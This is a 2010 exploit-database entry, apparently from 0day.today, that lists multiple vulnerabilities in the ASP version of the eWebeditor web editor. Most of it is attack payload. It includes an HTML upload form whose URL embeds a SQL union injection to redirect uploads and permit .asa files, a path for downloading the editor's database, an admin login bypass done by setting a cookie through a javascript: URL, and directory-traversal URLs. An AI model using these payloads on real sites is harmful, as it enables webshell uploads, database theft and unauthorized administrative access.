eWebeditor ASP Version Multiple Vulnerabilities

2010-01-29T00:00:00
ID 1337DAY-ID-10732
Type zdt
Reporter 0day Today Team
Modified 2010-01-29T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================
eWebeditor ASP Version Multiple Vulnerabilities
===============================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


#################################################################
# Application Info:
# Name: eWebeditor
# Version: ASP
#################################################################
Vulnerability:
 
=======================
Arbitrary File Upload
=======================
<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">
<p align="center">
<input type=file name=uploadfile size=100><br> <br>
<input type=submit value=Upload>  </p>
</form>
 
 
=======================
Arbitrary File Upload 2
=======================
http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup
 
 
=======================
Database Disclosure
=======================
http://site.com/ewebeditor/db/ewebeditor.mdb
 
 
=======================
Administrator bypass
=======================
http://site.com/eWebEditor/admin/login.asp
 
put this code instead URL
javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));
 
 
=======================
Directory Traversal
=======================
http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..
 
 
=======================
Directory Traversal 2
=======================
http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./..



#  0day.today [2018-01-03]  #